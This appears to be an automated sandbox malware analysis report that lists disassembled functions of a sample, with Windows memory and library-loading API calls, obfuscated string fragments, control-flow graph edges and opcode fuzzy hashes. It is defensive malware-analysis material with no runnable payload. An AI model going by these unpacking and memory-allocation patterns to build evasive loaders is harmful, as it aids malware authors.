                                              Function 004372F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 004373A4
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00437403
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: $
                                              • API String ID: 292159236-3993045852
                                              • Opcode ID: c37c6b5c451b38d6ae7fb4e42b3a4e5df3548462c2cec44560233b9523c4bb9e
                                              • Instruction ID: 72b04062a4941d8a1ae90bf3d94f17069bde73a1860f2a023997d650316118d9
                                              • Opcode Fuzzy Hash: c37c6b5c451b38d6ae7fb4e42b3a4e5df3548462c2cec44560233b9523c4bb9e
                                              • Instruction Fuzzy Hash: 36315C75208315AFE720CF14DC40B1FB7E8EB89718F10492DFAA49B390D7759808CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00419C00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00419CA1
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00419D08
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: ,
                                              • API String ID: 292159236-3772416878
                                              • Opcode ID: 0611d15885a3dbbd9c50aa940e03470727d33db14537f0f80ce13edc545bdf30
                                              • Instruction ID: 224a45add27236ffddbcf91f67d44791d7106cbfd86a407639e738a615638124
                                              • Opcode Fuzzy Hash: 0611d15885a3dbbd9c50aa940e03470727d33db14537f0f80ce13edc545bdf30
                                              • Instruction Fuzzy Hash: FC314975208304AFD710CF14DC44B5BBBE9FB89358F148A1DFAA49B390D37598488B96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00419E30 Relevance: 3.3, APIs: 2, Instructions: 330nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 0041A169
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0041A1B2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8928fae6beade2dcf9baa94eb3010de6f2032e7895fe792f899fcc72ab3f042e
                                              • Instruction ID: 4851f86f5c969aab153c4d67b6d620e1987cc244d1a234b01088b41b61ddc7f2
                                              • Opcode Fuzzy Hash: 8928fae6beade2dcf9baa94eb3010de6f2032e7895fe792f899fcc72ab3f042e
                                              • Instruction Fuzzy Hash: 27A1ECB15083119BDB10DF14C852BABB7E4EF85324F08492EF8959B391E378D945CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004381B0 Relevance: 3.2, APIs: 2, Instructions: 229nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 004382CC
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0043832D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: daa727d99653e8d7c216daf804cbd031a68e093b3bac86a89d72c7eca767e75d
                                              • Instruction ID: 0e20978d530c16e9394b08b5acea62e704e446e4b6a71f5478531374b9695d52
                                              • Opcode Fuzzy Hash: daa727d99653e8d7c216daf804cbd031a68e093b3bac86a89d72c7eca767e75d
                                              • Instruction Fuzzy Hash: CD81D2755083519FC311CF24C880A2BFBE1BBD9318F598A2DF89987392D774D909CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00423C16 Relevance: 3.2, APIs: 2, Instructions: 175COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2946a785a7335dce04309b2b89095e2828e62c30e1c85b38bab3a1f00ec962b8
                                              • Instruction ID: 46af719f9938c400c64fdf70310ab0e8678324bcb73df77baa7b064a5f7593ae
                                              • Opcode Fuzzy Hash: 2946a785a7335dce04309b2b89095e2828e62c30e1c85b38bab3a1f00ec962b8
                                              • Instruction Fuzzy Hash: 3951B075244B518FD725CF24C814BA2BBF0FF06309F58496DD1EACB292DB79A809CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004371C0 Relevance: 3.1, APIs: 2, Instructions: 94nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00437265
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 004372BD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8658342b72303bdb5dcf044743d588e8f186c13abbcc6335f68c62d6f4af87bf
                                              • Instruction ID: bb41111ea903b26384c474b20ffe10ba7d5028a5dfc9cf92b9ddedf0ce607f6b
                                              • Opcode Fuzzy Hash: 8658342b72303bdb5dcf044743d588e8f186c13abbcc6335f68c62d6f4af87bf
                                              • Instruction Fuzzy Hash: 9A315CB5508715AFEB10CF14C844B5FBBE8EB89324F048A2DF9A4973D1D7B49908CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004166A7 Relevance: 3.1, APIs: 2, Instructions: 93nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 0041675C
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 004167B1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 4d1564886dd15fbc451907a0650df2c02c7b50044f79724ef898f624542a511d
                                              • Instruction ID: 306ac6667e010ce3ca95cf983226b12161baf105d0fbc4103a341dece360a5dc
                                              • Opcode Fuzzy Hash: 4d1564886dd15fbc451907a0650df2c02c7b50044f79724ef898f624542a511d
                                              • Instruction Fuzzy Hash: 74318B756187408FD714CF14C840B5BB7E4BB88318F154A2DF9A59B3A1D774D8048B8A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00438470 Relevance: 3.1, APIs: 2, Instructions: 87nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 0043851F
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00438575
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: a36230d6e06b83005856d3deb3cb5c7e6891ac8839eccad9719101de5b405186
                                              • Instruction ID: 210a02fd3ac3a9c7de4a2c9f03c2dee55871b0ac6ad3cca68037809ea3fb048c
                                              • Opcode Fuzzy Hash: a36230d6e06b83005856d3deb3cb5c7e6891ac8839eccad9719101de5b405186
                                              • Instruction Fuzzy Hash: FA317C71108705AFD710DF18DC40B1FBBE5EB89368F118A2DF9A49B3A0D77598098B97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00415B15 Relevance: 3.1, APIs: 2, Instructions: 84nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,?,00003000,00000040), ref: 00415BF1
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 00415C44
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: f0a65c59f9e647ceb119464e9de520418e1774f71a95882de98c750e2f5e9c81
                                              • Instruction ID: cf38f5e4c694132fec633ddb84a0b2ff5bd7de55ce9f10e3111fc9438b58fcb2
                                              • Opcode Fuzzy Hash: f0a65c59f9e647ceb119464e9de520418e1774f71a95882de98c750e2f5e9c81
                                              • Instruction Fuzzy Hash: 1F316DB51087408FD724CF14C845B5BB7E4FB89308F104A2CE5AAD73A1D7749909CB5B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004177E0 Relevance: 3.1, APIs: 2, Instructions: 79nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 00417988
                                              • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,00000010,00008000), ref: 004179D1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 7b9d282766e2b2d54702f9f5361e03e5fdb8608fc6d5e87ce09f3ec85eaf7a92
                                              • Instruction ID: cc94dc1d494e4ba193adf9cc73b63730f54cdbd5af62b70491121e09dbd35659
                                              • Opcode Fuzzy Hash: 7b9d282766e2b2d54702f9f5361e03e5fdb8608fc6d5e87ce09f3ec85eaf7a92
                                              • Instruction Fuzzy Hash: B72146B52187408FE714CF14C844B5FB7E8BB89318F14892DE6A5CB3A1DB789948CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00415300 Relevance: 3.1, APIs: 2, Instructions: 77nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 004153A1
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004153E5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 7a99e40a18b15fb4f451b98af34db27f7cb69718761374f553ae4ff390797268
                                              • Instruction ID: e5406eb1a83feec3c8a703f7dd689946b4f1a946a6d1207d0dd454413abf4b9b
                                              • Opcode Fuzzy Hash: 7a99e40a18b15fb4f451b98af34db27f7cb69718761374f553ae4ff390797268
                                              • Instruction Fuzzy Hash: 48218E752087149FD710CF04C884B5FBBE8EB85368F108A2DF9A48B390D37498488B97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004344DB Relevance: 3.1, APIs: 2, Instructions: 76nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00434588
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000010,00000010,00008000), ref: 004345D7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 7b44a34a4d7dc7ce8f7daef14bb7ea40452adb0ee914cdd49307957870110eeb
                                              • Instruction ID: 2057b6f47b01386fa3a202dce32a123e9ae0d3f4901569fb8de3aaefe9a7e00a
                                              • Opcode Fuzzy Hash: 7b44a34a4d7dc7ce8f7daef14bb7ea40452adb0ee914cdd49307957870110eeb
                                              • Instruction Fuzzy Hash: 7A2148B51083059FE714CF44C854B1BBBE4FB85718F108A1DF6B59B2D0D7B8990C8B96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007E04C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007E04EE
                                              • Module32First.KERNEL32(00000000,00000224), ref: 007E050E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814752389.00000000007DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 007DF000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7df000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3833638111-0
                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction ID: 8993c403a18c809c55db0270f07541d9c64b62babde036acd65db993c534ffba
                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction Fuzzy Hash: E9F062312017556BD7203AB6988DF6F76E8BF4D725F100529E642D50C0DAB8ED868AA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00433CF7 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtOpenSection.NTDLL(?,00000004,?), ref: 00433D3F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: OpenSection
                                              • String ID:
                                              • API String ID: 1950954290-0
                                              • Opcode ID: a1b2d0c6f452ec355e3b7b26032b59bc7b4e9cdc8015fff17ebec047cd84e1d1
                                              • Instruction ID: 59f0636a04edb36526bc4193f572342f0fdef4a9ef69ea8737305f1d12902995
                                              • Opcode Fuzzy Hash: a1b2d0c6f452ec355e3b7b26032b59bc7b4e9cdc8015fff17ebec047cd84e1d1
                                              • Instruction Fuzzy Hash: DFE0E5F8504381BFCB08CF90EC42D367362ABD2B09F10D82CB55042251E6B1AA168F59
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00434D0A Relevance: 1.5, APIs: 1, Instructions: 32nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000002), ref: 00434D4A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: SectionView
                                              • String ID:
                                              • API String ID: 1323581903-0
                                              • Opcode ID: 1716d2300906b16e18785e5bd46e107ea2ec8003b4fb75253048da8650c948ce
                                              • Instruction ID: 9c132e3696f8a7cc1cfebb2d359e3e28ca7a10dda8dad0fc6a33583830de52bb
                                              • Opcode Fuzzy Hash: 1716d2300906b16e18785e5bd46e107ea2ec8003b4fb75253048da8650c948ce
                                              • Instruction Fuzzy Hash: 04F030703D83057AF6348B14CC47F6A76A9EB81F10F308719F7616A1E5D9E07D058B49
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00427EC8 Relevance: .0, Instructions: 20COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b668a006b1dd2da7ebdc0528d306120034ec08e06254bd56c7603d938047c537
                                              • Instruction ID: 7ce05bbed2077e6719604dc693853943d83de30e027127b8426862b0925af4eb
                                              • Opcode Fuzzy Hash: b668a006b1dd2da7ebdc0528d306120034ec08e06254bd56c7603d938047c537
                                              • Instruction Fuzzy Hash: F8F074741193418FD320EF24C95479BBBE0AB89304F419A1DE5C9C7291DBB59554DF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004275B6 Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 90memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 67 4275b6-4276d4 68 4276d6 67->68 69 42771d-427785 SysAllocString 67->69 70 4276d8-427719 68->70 71 42778f-4277bb 69->71 70->70 72 42771b 70->72 72->69
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: AllocString
                                              • String ID: $C$E$F$I$K$M$R$R$T
                                              • API String ID: 2525500382-2695317883
                                              • Opcode ID: ee097c0d674727a04bfda02b8a8ac34383e12d03d0d7ddf0e7c78353922365ca
                                              • Instruction ID: b65ea5a6236f1d5705806350ce78bc404e8b5f708e5abb6b759b3cc86dbe6bba
                                              • Opcode Fuzzy Hash: ee097c0d674727a04bfda02b8a8ac34383e12d03d0d7ddf0e7c78353922365ca
                                              • Instruction Fuzzy Hash: 53519D7450D7C0CEE771CB28C49879BBBE0AB96308F04895DD4DC8B382C7BA95499B57
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00434917 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 121libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 73 434917-4349cb call 436470 * 3 80 434a06-434a0b 73->80 81 4349cd-4349cf 73->81 84 434a12-434ac7 call 436470 * 3 80->84 85 434a0d 80->85 82 4349d0-434a04 81->82 82->80 82->82 93 434b06-434b0b LoadLibraryW 84->93 94 434ac9 84->94 85->84 95 434b12-434b25 93->95 96 434b0d 93->96 97 434ad0-434b04 94->97 96->95 97->93 97->97
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: C%R+$C%R+$R5X;$R5X;$U)X/$U)X/$V98?$V98?
                                              • API String ID: 1029625771-17140411
                                              • Opcode ID: b415310fc35505e012fbe591ffe0cefd97b98ee7380ce86a4f411c1e097ee61d
                                              • Instruction ID: 21bab591ecebe4fef30b80bc6ab6cda11f35366661598b552c3bc5dc332ec003
                                              • Opcode Fuzzy Hash: b415310fc35505e012fbe591ffe0cefd97b98ee7380ce86a4f411c1e097ee61d
                                              • Instruction Fuzzy Hash: CA517EB4509301AFD704CF10E9A072FBBF1FB8AB08F14992DE49957262D734D945DB8A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006E003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 98 6e003c-6e0047 99 6e004c-6e0263 call 6e0a3f call 6e0e0f call 6e0d90 VirtualAlloc 98->99 100 6e0049 98->100 115 6e028b-6e0292 99->115 116 6e0265-6e0289 call 6e0a69 99->116 100->99 118 6e02a1-6e02b0 115->118 120 6e02ce-6e03c2 VirtualProtect call 6e0cce call 6e0ce7 116->120 118->120 121 6e02b2-6e02cc 118->121 127 6e03d1-6e03e0 120->127 121->118 128 6e0439-6e04b8 VirtualFree 127->128 129 6e03e2-6e0437 call 6e0ce7 127->129 130 6e04be-6e04cd 128->130 131 6e05f4-6e05fe 128->131 129->127 133 6e04d3-6e04dd 130->133 134 6e077f-6e0789 131->134 135 6e0604-6e060d 131->135 133->131 140 6e04e3-6e0505 LoadLibraryA 133->140 138 6e078b-6e07a3 134->138 139 6e07a6-6e07b0 134->139 135->134 141 6e0613-6e0637 135->141 138->139 142 6e086e-6e08be LoadLibraryA 139->142 143 6e07b6-6e07cb 139->143 144 6e0517-6e0520 140->144 145 6e0507-6e0515 140->145 146 6e063e-6e0648 141->146 150 6e08c7-6e08f9 142->150 147 6e07d2-6e07d5 143->147 148 6e0526-6e0547 144->148 145->148 146->134 149 6e064e-6e065a 146->149 151 6e07d7-6e07e0 147->151 152 6e0824-6e0833 147->152 153 6e054d-6e0550 148->153 149->134 154 6e0660-6e066a 149->154 155 6e08fb-6e0901 150->155 156 6e0902-6e091d 150->156 157 6e07e4-6e0822 151->157 158 6e07e2 151->158 162 6e0839-6e083c 152->162 159 6e0556-6e056b 153->159 160 6e05e0-6e05ef 153->160 161 6e067a-6e0689 154->161 155->156 157->147 158->152 163 6e056f-6e057a 159->163 164 6e056d 159->164 160->133 165 6e068f-6e06b2 161->165 166 6e0750-6e077a 161->166 162->142 167 6e083e-6e0847 162->167 169 6e057c-6e0599 163->169 170 6e059b-6e05bb 163->170 164->160 171 6e06ef-6e06fc 165->171 172 6e06b4-6e06ed 165->172 166->146 173 6e084b-6e086c 167->173 174 6e0849 167->174 181 6e05bd-6e05db 169->181 170->181 175 6e06fe-6e0748 171->175 176 6e074b 171->176 172->171 173->162 174->142 175->176 176->161 181->153
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006E024D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cess$kernel32.dll
                                              • API String ID: 4275171209-1230238691
                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction ID: 0e35a6c12bade70b1b465d455dd422e68b4f7a7e37c090aa8174b37a3a36a116
                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction Fuzzy Hash: 12527874A01269DFDB64CF59C984BA8BBB1BF09304F1480D9E90DAB351DB70AE85DF14
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00433F74 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 279 433f74-434ac7 call 436470 * 3 287 434b06-434b0b LoadLibraryW 279->287 288 434ac9 279->288 289 434b12-434b25 287->289 290 434b0d 287->290 291 434ad0-434b04 288->291 290->289 291->287 291->291
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: C%R+$R5X;$U)X/$V98?
                                              • API String ID: 1029625771-2675831890
                                              • Opcode ID: 8e1a4ce2a09d512d88441af55b70a62b48b6dae6c781d40d5880f1a539daa340
                                              • Instruction ID: d8ac3ec1662ce7fc204c67f60de0c5ebde28b7fe9e327e361a7d478e3e6a78fd
                                              • Opcode Fuzzy Hash: 8e1a4ce2a09d512d88441af55b70a62b48b6dae6c781d40d5880f1a539daa340
                                              • Instruction Fuzzy Hash: 5F21AEB4509301ABD704CF10E9A072BBBF1EBCAB09F14892DE49917252D738D945DB8A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00423105 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 446COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: -7.4$MR R
                                              • API String ID: 0-942721988
                                              • Opcode ID: a2553a3257c9e09cdaacefa5ee88dd7e452b3dcb077e2faff38b9d95aea45a84
                                              • Instruction ID: 492bbf8a237798f33d5a261da23dae48e0fbb4a352f940bd821eaad0080f4603
                                              • Opcode Fuzzy Hash: a2553a3257c9e09cdaacefa5ee88dd7e452b3dcb077e2faff38b9d95aea45a84
